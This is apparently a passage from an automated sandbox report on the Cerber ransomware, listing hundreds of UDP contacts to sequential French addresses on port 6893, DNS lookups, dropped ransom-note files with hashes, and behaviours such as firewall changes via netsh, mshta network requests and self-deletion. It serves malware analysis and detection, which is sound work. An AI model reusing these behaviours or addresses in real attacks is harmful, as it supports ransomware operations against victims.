| FR | 178.33.161.197:6893 | udp | |
| FR | 178.33.161.198:6893 | udp | |
| FR | 178.33.161.199:6893 | udp | |
| FR | 178.33.161.200:6893 | udp | |
| FR | 178.33.161.201:6893 | udp | |
| FR | 178.33.161.202:6893 | udp | |
| FR | 178.33.161.203:6893 | udp | |
| FR | 178.33.161.204:6893 | udp | |
| FR | 178.33.161.205:6893 | udp | |
| FR | 178.33.161.206:6893 | udp | |
| FR | 178.33.161.207:6893 | udp | |
| FR | 178.33.161.208:6893 | udp | |
| FR | 178.33.161.209:6893 | udp | |
| FR | 178.33.161.210:6893 | udp | |
| FR | 178.33.161.211:6893 | udp | |
| FR | 178.33.161.212:6893 | udp | |
| FR | 178.33.161.213:6893 | udp | |
| FR | 178.33.161.214:6893 | udp | |
| FR | 178.33.161.215:6893 | udp | |
| FR | 178.33.161.216:6893 | udp | |
| FR | 178.33.161.217:6893 | udp | |
| FR | 178.33.161.218:6893 | udp | |
| FR | 178.33.161.219:6893 | udp | |
| FR | 178.33.161.220:6893 | udp | |
| FR | 178.33.161.221:6893 | udp | |
| FR | 178.33.161.222:6893 | udp | |
| FR | 178.33.161.223:6893 | udp | |
| FR | 178.33.161.224:6893 | udp | |
| FR | 178.33.161.225:6893 | udp | |
| FR | 178.33.161.226:6893 | udp | |
| FR | 178.33.161.227:6893 | udp | |
| FR | 178.33.161.228:6893 | udp | |
| FR | 178.33.161.229:6893 | udp | |
| FR | 178.33.161.230:6893 | udp | |
| FR | 178.33.161.231:6893 | udp | |
| FR | 178.33.161.232:6893 | udp | |
| FR | 178.33.161.233:6893 | udp | |
| FR | 178.33.161.234:6893 | udp | |
| FR | 178.33.161.235:6893 | udp | |
| FR | 178.33.161.236:6893 | udp | |
| FR | 178.33.161.237:6893 | udp | |
| FR | 178.33.161.238:6893 | udp | |
| FR | 178.33.161.239:6893 | udp | |
| FR | 178.33.161.240:6893 | udp | |
| FR | 178.33.161.241:6893 | udp | |
| FR | 178.33.161.242:6893 | udp | |
| FR | 178.33.161.243:6893 | udp | |
| FR | 178.33.161.244:6893 | udp | |
| FR | 178.33.161.245:6893 | udp | |
| FR | 178.33.161.246:6893 | udp | |
| FR | 178.33.161.247:6893 | udp | |
| FR | 178.33.161.248:6893 | udp | |
| FR | 178.33.161.249:6893 | udp | |
| FR | 178.33.161.250:6893 | udp | |
| FR | 178.33.161.251:6893 | udp | |
| FR | 178.33.161.252:6893 | udp | |
| FR | 178.33.161.253:6893 | udp | |
| FR | 178.33.161.254:6893 | udp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| FR | 178.33.161.255:6893 | udp | |
| FR | 178.33.162.0:6893 | udp | |
| FR | 178.33.162.1:6893 | udp | |
| FR | 178.33.162.2:6893 | udp | |
| FR | 178.33.162.3:6893 | udp | |
| FR | 178.33.162.4:6893 | udp | |
| FR | 178.33.162.5:6893 | udp | |
| FR | 178.33.162.6:6893 | udp | |
| FR | 178.33.162.7:6893 | udp | |
| FR | 178.33.162.8:6893 | udp | |
| FR | 178.33.162.9:6893 | udp | |
| FR | 178.33.162.10:6893 | udp | |
| FR | 178.33.162.11:6893 | udp | |
| FR | 178.33.162.12:6893 | udp | |
| FR | 178.33.162.13:6893 | udp | |
| FR | 178.33.162.14:6893 | udp | |
| FR | 178.33.162.15:6893 | udp | |
| FR | 178.33.162.16:6893 | udp | |
| FR | 178.33.162.17:6893 | udp | |
| FR | 178.33.162.18:6893 | udp | |
| FR | 178.33.162.19:6893 | udp | |
| FR | 178.33.162.20:6893 | udp | |
| FR | 178.33.162.21:6893 | udp | |
| FR | 178.33.162.22:6893 | udp | |
| FR | 178.33.162.23:6893 | udp | |
| FR | 178.33.162.24:6893 | udp | |
| FR | 178.33.162.25:6893 | udp | |
| FR | 178.33.162.26:6893 | udp | |
| FR | 178.33.162.27:6893 | udp | |
| FR | 178.33.162.28:6893 | udp | |
| FR | 178.33.162.29:6893 | udp | |
| FR | 178.33.162.30:6893 | udp | |
| FR | 178.33.162.31:6893 | udp | |
| FR | 178.33.162.32:6893 | udp | |
| FR | 178.33.162.33:6893 | udp | |
| FR | 178.33.162.34:6893 | udp | |
| FR | 178.33.162.35:6893 | udp | |
| FR | 178.33.162.36:6893 | udp | |
| FR | 178.33.162.37:6893 | udp | |
| FR | 178.33.162.38:6893 | udp | |
| FR | 178.33.162.39:6893 | udp | |
| FR | 178.33.162.40:6893 | udp | |
| FR | 178.33.162.41:6893 | udp | |
| FR | 178.33.162.42:6893 | udp | |
| FR | 178.33.162.43:6893 | udp | |
| FR | 178.33.162.44:6893 | udp | |
| FR | 178.33.162.45:6893 | udp | |
| FR | 178.33.162.46:6893 | udp | |
| FR | 178.33.162.47:6893 | udp | |
| FR | 178.33.162.48:6893 | udp | |
| FR | 178.33.162.49:6893 | udp | |
| FR | 178.33.162.50:6893 | udp | |
| FR | 178.33.162.51:6893 | udp | |
| FR | 178.33.162.52:6893 | udp | |
| FR | 178.33.162.53:6893 | udp | |
| FR | 178.33.162.54:6893 | udp | |
| FR | 178.33.162.55:6893 | udp | |
| FR | 178.33.162.56:6893 | udp | |
| FR | 178.33.162.57:6893 | udp | |
| FR | 178.33.162.58:6893 | udp | |
| FR | 178.33.162.59:6893 | udp | |
| FR | 178.33.162.60:6893 | udp | |
| FR | 178.33.162.61:6893 | udp | |
| FR | 178.33.162.62:6893 | udp | |
| FR | 178.33.162.63:6893 | udp | |
| FR | 178.33.162.64:6893 | udp | |
| FR | 178.33.162.65:6893 | udp | |
| FR | 178.33.162.66:6893 | udp | |
| FR | 178.33.162.67:6893 | udp | |
| FR | 178.33.162.68:6893 | udp | |
| FR | 178.33.162.69:6893 | udp | |
| FR | 178.33.162.70:6893 | udp | |
| FR | 178.33.162.71:6893 | udp | |
| FR | 178.33.162.72:6893 | udp | |
| FR | 178.33.162.73:6893 | udp | |
| FR | 178.33.162.74:6893 | udp | |
| FR | 178.33.162.75:6893 | udp | |
| FR | 178.33.162.76:6893 | udp | |
| FR | 178.33.162.77:6893 | udp | |
| FR | 178.33.162.78:6893 | udp | |
| FR | 178.33.162.79:6893 | udp | |
| FR | 178.33.162.80:6893 | udp | |
| FR | 178.33.162.81:6893 | udp | |
| FR | 178.33.162.82:6893 | udp | |
| FR | 178.33.162.83:6893 | udp | |
| FR | 178.33.162.84:6893 | udp | |
| FR | 178.33.162.85:6893 | udp | |
| FR | 178.33.162.86:6893 | udp | |
| FR | 178.33.162.87:6893 | udp | |
| FR | 178.33.162.88:6893 | udp | |
| FR | 178.33.162.89:6893 | udp | |
| FR | 178.33.162.90:6893 | udp | |
| FR | 178.33.162.91:6893 | udp | |
| FR | 178.33.162.92:6893 | udp | |
| FR | 178.33.162.93:6893 | udp | |
| FR | 178.33.162.94:6893 | udp | |
| FR | 178.33.162.95:6893 | udp | |
| FR | 178.33.162.96:6893 | udp | |
| FR | 178.33.162.97:6893 | udp | |
| FR | 178.33.162.98:6893 | udp | |
| FR | 178.33.162.99:6893 | udp | |
| FR | 178.33.162.100:6893 | udp | |
| FR | 178.33.162.101:6893 | udp | |
| FR | 178.33.162.102:6893 | udp | |
| FR | 178.33.162.103:6893 | udp | |
| FR | 178.33.162.104:6893 | udp | |
| FR | 178.33.162.105:6893 | udp | |
| FR | 178.33.162.106:6893 | udp | |
| FR | 178.33.162.107:6893 | udp | |
| FR | 178.33.162.108:6893 | udp | |
| FR | 178.33.162.109:6893 | udp | |
| FR | 178.33.162.110:6893 | udp | |
| FR | 178.33.162.111:6893 | udp | |
| FR | 178.33.162.112:6893 | udp | |
| FR | 178.33.162.113:6893 | udp | |
| FR | 178.33.162.114:6893 | udp | |
| FR | 178.33.162.115:6893 | udp | |
| FR | 178.33.162.116:6893 | udp | |
| FR | 178.33.162.117:6893 | udp | |
| FR | 178.33.162.118:6893 | udp | |
| FR | 178.33.162.119:6893 | udp | |
| FR | 178.33.162.120:6893 | udp | |
| FR | 178.33.162.121:6893 | udp | |
| FR | 178.33.162.122:6893 | udp | |
| FR | 178.33.162.123:6893 | udp | |
| FR | 178.33.162.124:6893 | udp | |
| FR | 178.33.162.125:6893 | udp | |
| FR | 178.33.162.126:6893 | udp | |
| FR | 178.33.162.127:6893 | udp | |
| FR | 178.33.162.128:6893 | udp | |
| FR | 178.33.162.129:6893 | udp | |
| FR | 178.33.162.130:6893 | udp | |
| FR | 178.33.162.131:6893 | udp | |
| FR | 178.33.162.132:6893 | udp | |
| FR | 178.33.162.133:6893 | udp | |
| FR | 178.33.162.134:6893 | udp | |
| FR | 178.33.162.135:6893 | udp | |
| FR | 178.33.162.136:6893 | udp | |
| FR | 178.33.162.137:6893 | udp | |
| FR | 178.33.162.138:6893 | udp | |
| FR | 178.33.162.139:6893 | udp | |
| FR | 178.33.162.140:6893 | udp | |
| FR | 178.33.162.141:6893 | udp | |
| FR | 178.33.162.142:6893 | udp | |
| FR | 178.33.162.143:6893 | udp | |
| FR | 178.33.162.144:6893 | udp | |
| FR | 178.33.162.145:6893 | udp | |
| FR | 178.33.162.146:6893 | udp | |
| FR | 178.33.162.147:6893 | udp | |
| FR | 178.33.162.148:6893 | udp | |
| FR | 178.33.162.149:6893 | udp | |
| FR | 178.33.162.150:6893 | udp | |
| FR | 178.33.162.151:6893 | udp | |
| FR | 178.33.162.152:6893 | udp | |
| FR | 178.33.162.153:6893 | udp | |
| FR | 178.33.162.154:6893 | udp | |
| FR | 178.33.162.155:6893 | udp | |
| FR | 178.33.162.156:6893 | udp | |
| FR | 178.33.162.157:6893 | udp | |
| FR | 178.33.162.158:6893 | udp | |
| FR | 178.33.162.159:6893 | udp | |
| FR | 178.33.162.160:6893 | udp | |
| FR | 178.33.162.161:6893 | udp | |
| FR | 178.33.162.162:6893 | udp | |
| FR | 178.33.162.163:6893 | udp | |
| FR | 178.33.162.164:6893 | udp | |
| FR | 178.33.162.165:6893 | udp | |
| FR | 178.33.162.166:6893 | udp | |
| FR | 178.33.162.167:6893 | udp | |
| FR | 178.33.162.168:6893 | udp | |
| FR | 178.33.162.169:6893 | udp | |
| FR | 178.33.162.170:6893 | udp | |
| FR | 178.33.162.171:6893 | udp | |
| FR | 178.33.162.172:6893 | udp | |
| FR | 178.33.162.173:6893 | udp | |
| FR | 178.33.162.174:6893 | udp | |
| FR | 178.33.162.175:6893 | udp | |
| FR | 178.33.162.176:6893 | udp | |
| FR | 178.33.162.177:6893 | udp | |
| FR | 178.33.162.178:6893 | udp | |
| FR | 178.33.162.179:6893 | udp | |
| FR | 178.33.162.180:6893 | udp | |
| FR | 178.33.162.181:6893 | udp | |
| FR | 178.33.162.182:6893 | udp | |
| FR | 178.33.162.183:6893 | udp | |
| FR | 178.33.162.184:6893 | udp | |
| FR | 178.33.162.185:6893 | udp | |
| FR | 178.33.162.186:6893 | udp | |
| FR | 178.33.162.187:6893 | udp | |
| FR | 178.33.162.188:6893 | udp | |
| FR | 178.33.162.189:6893 | udp | |
| FR | 178.33.162.190:6893 | udp | |
| FR | 178.33.162.191:6893 | udp | |
| FR | 178.33.162.192:6893 | udp | |
| FR | 178.33.162.193:6893 | udp | |
| FR | 178.33.162.194:6893 | udp | |
| FR | 178.33.162.195:6893 | udp | |
| FR | 178.33.162.196:6893 | udp | |
| FR | 178.33.162.197:6893 | udp | |
| FR | 178.33.162.198:6893 | udp | |
| FR | 178.33.162.199:6893 | udp | |
| FR | 178.33.162.200:6893 | udp | |
| FR | 178.33.162.201:6893 | udp | |
| FR | 178.33.162.202:6893 | udp | |
| FR | 178.33.162.203:6893 | udp | |
| FR | 178.33.162.204:6893 | udp | |
| FR | 178.33.162.205:6893 | udp | |
| FR | 178.33.162.206:6893 | udp | |
| FR | 178.33.162.207:6893 | udp | |
| FR | 178.33.162.208:6893 | udp | |
| FR | 178.33.162.209:6893 | udp | |
| FR | 178.33.162.210:6893 | udp | |
| FR | 178.33.162.211:6893 | udp | |
| FR | 178.33.162.212:6893 | udp | |
| FR | 178.33.162.213:6893 | udp | |
| FR | 178.33.162.214:6893 | udp | |
| FR | 178.33.162.215:6893 | udp | |
| FR | 178.33.162.216:6893 | udp | |
| FR | 178.33.162.217:6893 | udp | |
| FR | 178.33.162.218:6893 | udp | |
| FR | 178.33.162.219:6893 | udp | |
| FR | 178.33.162.220:6893 | udp | |
| FR | 178.33.162.221:6893 | udp | |
| FR | 178.33.162.222:6893 | udp | |
| FR | 178.33.162.223:6893 | udp | |
| FR | 178.33.162.224:6893 | udp | |
| FR | 178.33.162.225:6893 | udp | |
| FR | 178.33.162.226:6893 | udp | |
| FR | 178.33.162.227:6893 | udp | |
| FR | 178.33.162.228:6893 | udp | |
| FR | 178.33.162.229:6893 | udp | |
| FR | 178.33.162.230:6893 | udp | |
| FR | 178.33.162.231:6893 | udp | |
| FR | 178.33.162.232:6893 | udp | |
| FR | 178.33.162.233:6893 | udp | |
| FR | 178.33.162.234:6893 | udp | |
| FR | 178.33.162.235:6893 | udp | |
| FR | 178.33.162.236:6893 | udp | |
| FR | 178.33.162.237:6893 | udp | |
| FR | 178.33.162.238:6893 | udp | |
| FR | 178.33.162.239:6893 | udp | |
| FR | 178.33.162.240:6893 | udp | |
| FR | 178.33.162.241:6893 | udp | |
| FR | 178.33.162.242:6893 | udp | |
| FR | 178.33.162.243:6893 | udp | |
| FR | 178.33.162.244:6893 | udp | |
| FR | 178.33.162.245:6893 | udp | |
| FR | 178.33.162.246:6893 | udp | |
| FR | 178.33.162.247:6893 | udp | |
| FR | 178.33.162.248:6893 | udp | |
| FR | 178.33.162.249:6893 | udp | |
| FR | 178.33.162.250:6893 | udp | |
| FR | 178.33.162.251:6893 | udp | |
| FR | 178.33.162.252:6893 | udp | |
| FR | 178.33.162.253:6893 | udp | |
| FR | 178.33.162.254:6893 | udp | |
| FR | 178.33.162.255:6893 | udp | |
| FR | 178.33.163.0:6893 | udp | |
| FR | 178.33.163.1:6893 | udp | |
| FR | 178.33.163.2:6893 | udp | |
| FR | 178.33.163.3:6893 | udp | |
| FR | 178.33.163.4:6893 | udp | |
| FR | 178.33.163.5:6893 | udp | |
| FR | 178.33.163.6:6893 | udp | |
| FR | 178.33.163.7:6893 | udp | |
| FR | 178.33.163.8:6893 | udp | |
| FR | 178.33.163.9:6893 | udp | |
| FR | 178.33.163.10:6893 | udp | |
| FR | 178.33.163.11:6893 | udp | |
| FR | 178.33.163.12:6893 | udp | |
| FR | 178.33.163.13:6893 | udp | |
| FR | 178.33.163.14:6893 | udp | |
| FR | 178.33.163.15:6893 | udp | |
| FR | 178.33.163.16:6893 | udp | |
| FR | 178.33.163.17:6893 | udp | |
| FR | 178.33.163.18:6893 | udp | |
| FR | 178.33.163.19:6893 | udp | |
| FR | 178.33.163.20:6893 | udp | |
| FR | 178.33.163.21:6893 | udp | |
| FR | 178.33.163.22:6893 | udp | |
| FR | 178.33.163.23:6893 | udp | |
| FR | 178.33.163.24:6893 | udp | |
| FR | 178.33.163.25:6893 | udp | |
| FR | 178.33.163.26:6893 | udp | |
| FR | 178.33.163.27:6893 | udp | |
| FR | 178.33.163.28:6893 | udp | |
| FR | 178.33.163.29:6893 | udp | |
| FR | 178.33.163.30:6893 | udp | |
| FR | 178.33.163.31:6893 | udp | |
| FR | 178.33.163.32:6893 | udp | |
| FR | 178.33.163.33:6893 | udp | |
| FR | 178.33.163.34:6893 | udp | |
| FR | 178.33.163.35:6893 | udp | |
| FR | 178.33.163.36:6893 | udp | |
| FR | 178.33.163.37:6893 | udp | |
| FR | 178.33.163.38:6893 | udp | |
| FR | 178.33.163.39:6893 | udp | |
| FR | 178.33.163.40:6893 | udp | |
| FR | 178.33.163.41:6893 | udp | |
| FR | 178.33.163.42:6893 | udp | |
| FR | 178.33.163.43:6893 | udp | |
| FR | 178.33.163.44:6893 | udp | |
| FR | 178.33.163.45:6893 | udp | |
| FR | 178.33.163.46:6893 | udp | |
| FR | 178.33.163.47:6893 | udp | |
| FR | 178.33.163.48:6893 | udp | |
| FR | 178.33.163.49:6893 | udp | |
| FR | 178.33.163.50:6893 | udp | |
| FR | 178.33.163.51:6893 | udp | |
| FR | 178.33.163.52:6893 | udp | |
| FR | 178.33.163.53:6893 | udp | |
| FR | 178.33.163.54:6893 | udp | |
| FR | 178.33.163.55:6893 | udp | |
| FR | 178.33.163.56:6893 | udp | |
| FR | 178.33.163.57:6893 | udp | |
| FR | 178.33.163.58:6893 | udp | |
| FR | 178.33.163.59:6893 | udp | |
| FR | 178.33.163.60:6893 | udp | |
| FR | 178.33.163.61:6893 | udp | |
| FR | 178.33.163.62:6893 | udp | |
| FR | 178.33.163.63:6893 | udp | |
| FR | 178.33.163.64:6893 | udp | |
| FR | 178.33.163.65:6893 | udp | |
| FR | 178.33.163.66:6893 | udp | |
| FR | 178.33.163.67:6893 | udp | |
| FR | 178.33.163.68:6893 | udp | |
| FR | 178.33.163.69:6893 | udp | |
| FR | 178.33.163.70:6893 | udp | |
| FR | 178.33.163.71:6893 | udp | |
| FR | 178.33.163.72:6893 | udp | |
| FR | 178.33.163.73:6893 | udp | |
| FR | 178.33.163.74:6893 | udp | |
| FR | 178.33.163.75:6893 | udp | |
| FR | 178.33.163.76:6893 | udp | |
| FR | 178.33.163.77:6893 | udp | |
| FR | 178.33.163.78:6893 | udp | |
| FR | 178.33.163.79:6893 | udp | |
| FR | 178.33.163.80:6893 | udp | |
| FR | 178.33.163.81:6893 | udp | |
| FR | 178.33.163.82:6893 | udp | |
| FR | 178.33.163.83:6893 | udp | |
| FR | 178.33.163.84:6893 | udp | |
| FR | 178.33.163.85:6893 | udp | |
| FR | 178.33.163.86:6893 | udp | |
| FR | 178.33.163.87:6893 | udp | |
| FR | 178.33.163.88:6893 | udp | |
| FR | 178.33.163.89:6893 | udp | |
| FR | 178.33.163.90:6893 | udp | |
| FR | 178.33.163.91:6893 | udp | |
| FR | 178.33.163.92:6893 | udp | |
| FR | 178.33.163.93:6893 | udp | |
| FR | 178.33.163.94:6893 | udp | |
| FR | 178.33.163.95:6893 | udp | |
| FR | 178.33.163.96:6893 | udp | |
| FR | 178.33.163.97:6893 | udp | |
| FR | 178.33.163.98:6893 | udp | |
| FR | 178.33.163.99:6893 | udp | |
| FR | 178.33.163.100:6893 | udp | |
| FR | 178.33.163.101:6893 | udp | |
| FR | 178.33.163.102:6893 | udp | |
| FR | 178.33.163.103:6893 | udp | |
| FR | 178.33.163.104:6893 | udp | |
| FR | 178.33.163.105:6893 | udp | |
| FR | 178.33.163.106:6893 | udp | |
| FR | 178.33.163.107:6893 | udp | |
| FR | 178.33.163.108:6893 | udp | |
| FR | 178.33.163.109:6893 | udp | |
| FR | 178.33.163.110:6893 | udp | |
| FR | 178.33.163.111:6893 | udp | |
| FR | 178.33.163.112:6893 | udp | |
| FR | 178.33.163.113:6893 | udp | |
| FR | 178.33.163.114:6893 | udp | |
| FR | 178.33.163.115:6893 | udp | |
| FR | 178.33.163.116:6893 | udp | |
| FR | 178.33.163.117:6893 | udp | |
| FR | 178.33.163.118:6893 | udp | |
| FR | 178.33.163.119:6893 | udp | |
| FR | 178.33.163.120:6893 | udp | |
| FR | 178.33.163.121:6893 | udp | |
| FR | 178.33.163.122:6893 | udp | |
| FR | 178.33.163.123:6893 | udp | |
| FR | 178.33.163.124:6893 | udp | |
| FR | 178.33.163.125:6893 | udp | |
| FR | 178.33.163.126:6893 | udp | |
| FR | 178.33.163.127:6893 | udp | |
| FR | 178.33.163.128:6893 | udp | |
| FR | 178.33.163.129:6893 | udp | |
| FR | 178.33.163.130:6893 | udp | |
| FR | 178.33.163.131:6893 | udp | |
| FR | 178.33.163.132:6893 | udp | |
| FR | 178.33.163.133:6893 | udp | |
| FR | 178.33.163.134:6893 | udp | |
| FR | 178.33.163.135:6893 | udp | |
| FR | 178.33.163.136:6893 | udp | |
| FR | 178.33.163.137:6893 | udp | |
| FR | 178.33.163.138:6893 | udp | |
| FR | 178.33.163.139:6893 | udp | |
| FR | 178.33.163.140:6893 | udp | |
| FR | 178.33.163.141:6893 | udp | |
| FR | 178.33.163.142:6893 | udp | |
| FR | 178.33.163.143:6893 | udp | |
| FR | 178.33.163.144:6893 | udp | |
| FR | 178.33.163.145:6893 | udp | |
| FR | 178.33.163.146:6893 | udp | |
| FR | 178.33.163.147:6893 | udp | |
| FR | 178.33.163.148:6893 | udp | |
| FR | 178.33.163.149:6893 | udp | |
| FR | 178.33.163.150:6893 | udp | |
| FR | 178.33.163.151:6893 | udp | |
| FR | 178.33.163.152:6893 | udp | |
| FR | 178.33.163.153:6893 | udp | |
| FR | 178.33.163.154:6893 | udp | |
| FR | 178.33.163.155:6893 | udp | |
| FR | 178.33.163.156:6893 | udp | |
| FR | 178.33.163.157:6893 | udp | |
| FR | 178.33.163.158:6893 | udp | |
| FR | 178.33.163.159:6893 | udp | |
| FR | 178.33.163.160:6893 | udp | |
| FR | 178.33.163.161:6893 | udp | |
| FR | 178.33.163.162:6893 | udp | |
| FR | 178.33.163.163:6893 | udp | |
| FR | 178.33.163.164:6893 | udp | |
| FR | 178.33.163.165:6893 | udp | |
| FR | 178.33.163.166:6893 | udp | |
| FR | 178.33.163.167:6893 | udp | |
| FR | 178.33.163.168:6893 | udp | |
| FR | 178.33.163.169:6893 | udp | |
| FR | 178.33.163.170:6893 | udp | |
| FR | 178.33.163.171:6893 | udp | |
| FR | 178.33.163.172:6893 | udp | |
| FR | 178.33.163.173:6893 | udp | |
| FR | 178.33.163.174:6893 | udp | |
| FR | 178.33.163.175:6893 | udp | |
| FR | 178.33.163.176:6893 | udp | |
| FR | 178.33.163.177:6893 | udp | |
| FR | 178.33.163.178:6893 | udp | |
| FR | 178.33.163.179:6893 | udp | |
| FR | 178.33.163.180:6893 | udp | |
| FR | 178.33.163.181:6893 | udp | |
| FR | 178.33.163.182:6893 | udp | |
| FR | 178.33.163.183:6893 | udp | |
| FR | 178.33.163.184:6893 | udp | |
| FR | 178.33.163.185:6893 | udp | |
| FR | 178.33.163.186:6893 | udp | |
| FR | 178.33.163.187:6893 | udp | |
| FR | 178.33.163.188:6893 | udp | |
| FR | 178.33.163.189:6893 | udp | |
| FR | 178.33.163.190:6893 | udp | |
| FR | 178.33.163.191:6893 | udp | |
| FR | 178.33.163.192:6893 | udp | |
| FR | 178.33.163.193:6893 | udp | |
| FR | 178.33.163.194:6893 | udp | |
| FR | 178.33.163.195:6893 | udp | |
| FR | 178.33.163.196:6893 | udp | |
| FR | 178.33.163.197:6893 | udp | |
| FR | 178.33.163.198:6893 | udp | |
| FR | 178.33.163.199:6893 | udp | |
| FR | 178.33.163.200:6893 | udp | |
| FR | 178.33.163.201:6893 | udp | |
| FR | 178.33.163.202:6893 | udp | |
| FR | 178.33.163.203:6893 | udp | |
| FR | 178.33.163.204:6893 | udp | |
| FR | 178.33.163.205:6893 | udp | |
| FR | 178.33.163.206:6893 | udp | |
| FR | 178.33.163.207:6893 | udp | |
| FR | 178.33.163.208:6893 | udp | |
| FR | 178.33.163.209:6893 | udp | |
| FR | 178.33.163.210:6893 | udp | |
| FR | 178.33.163.211:6893 | udp | |
| FR | 178.33.163.212:6893 | udp | |
| FR | 178.33.163.213:6893 | udp | |
| FR | 178.33.163.214:6893 | udp | |
| FR | 178.33.163.215:6893 | udp | |
| FR | 178.33.163.216:6893 | udp | |
| FR | 178.33.163.217:6893 | udp | |
| FR | 178.33.163.218:6893 | udp | |
| FR | 178.33.163.219:6893 | udp | |
| FR | 178.33.163.220:6893 | udp | |
| FR | 178.33.163.221:6893 | udp | |
| FR | 178.33.163.222:6893 | udp | |
| FR | 178.33.163.223:6893 | udp | |
| FR | 178.33.163.224:6893 | udp | |
| FR | 178.33.163.225:6893 | udp | |
| FR | 178.33.163.226:6893 | udp | |
| FR | 178.33.163.227:6893 | udp | |
| FR | 178.33.163.228:6893 | udp | |
| FR | 178.33.163.229:6893 | udp | |
| FR | 178.33.163.230:6893 | udp | |
| FR | 178.33.163.231:6893 | udp | |
| FR | 178.33.163.232:6893 | udp | |
| FR | 178.33.163.233:6893 | udp | |
| FR | 178.33.163.234:6893 | udp | |
| FR | 178.33.163.235:6893 | udp | |
| FR | 178.33.163.236:6893 | udp | |
| FR | 178.33.163.237:6893 | udp | |
| FR | 178.33.163.238:6893 | udp | |
| FR | 178.33.163.239:6893 | udp | |
| FR | 178.33.163.240:6893 | udp | |
| FR | 178.33.163.241:6893 | udp | |
| FR | 178.33.163.242:6893 | udp | |
| FR | 178.33.163.243:6893 | udp | |
| FR | 178.33.163.244:6893 | udp | |
| FR | 178.33.163.245:6893 | udp | |
| FR | 178.33.163.246:6893 | udp | |
| FR | 178.33.163.247:6893 | udp | |
| FR | 178.33.163.248:6893 | udp | |
| FR | 178.33.163.249:6893 | udp | |
| FR | 178.33.163.250:6893 | udp | |
| FR | 178.33.163.251:6893 | udp | |
| FR | 178.33.163.252:6893 | udp | |
| FR | 178.33.163.253:6893 | udp | |
| FR | 178.33.163.254:6893 | udp | |
| FR | 178.33.163.255:6893 | udp | |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 216.58.204.74:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.242.123.52.in-addr.arpa | udp |
Files
memory/8-0-0x0000000000640000-0x0000000000671000-memory.dmp
memory/8-1-0x0000000000400000-0x0000000000435000-memory.dmp
memory/8-3-0x0000000000400000-0x0000000000435000-memory.dmp
memory/8-7-0x0000000000400000-0x0000000000435000-memory.dmp
memory/8-8-0x0000000000400000-0x0000000000435000-memory.dmp
memory/8-12-0x0000000000400000-0x0000000000435000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\_R_E_A_D___T_H_I_S___PP0MW4ML_.txt
| MD5 | 7f51304cadcf3569710d715abffb6c66 |
| SHA1 | 90d6a81c1c8815300ad8033675451c2d81ed6122 |
| SHA256 | 78974b71ac312f5dd8305d10f826de9d13e2b31183a6cdfe2fadb26828cd990f |
| SHA512 | 3ced58767d702ecf0f351e0e99787314c06516ea7d5404a2001d98fc5d7f7b55304ddd372b62af0660f89285a2154d04ccc1c7ad891dc0adc5c5e215fa1c165c |
C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\_R_E_A_D___T_H_I_S___DAVP5KX_.hta
| MD5 | 5629fc7751dcdf21f245a775d12697ab |
| SHA1 | f2c6e68b3c9339c1f0263d610df1b61431bcbac8 |
| SHA256 | b35e5a86466a238e4b15671fc0fcd0fca0b6314c2ee3c782c40e72bc2ca6ba7d |
| SHA512 | f5ed260dc3e20656c69902bf0ed05d77e6346d47e79912637c429e393083cf894fccac5f641da8bdfe4bd050d75c8c03442a1a32f6c9b31f28bdfa096ea599de |
memory/8-353-0x0000000000400000-0x0000000000435000-memory.dmp
memory/8-350-0x0000000000400000-0x0000000000435000-memory.dmp
memory/8-360-0x0000000000400000-0x0000000000435000-memory.dmp
memory/8-379-0x0000000000400000-0x0000000000435000-memory.dmp
memory/8-380-0x0000000000440000-0x0000000000451000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:02
Platform
win7-20240220-en
Max time kernel
136s
Max time network
124s
Command Line
Signatures
Cerber
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Contacts a large (1095) amount of remote hosts
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
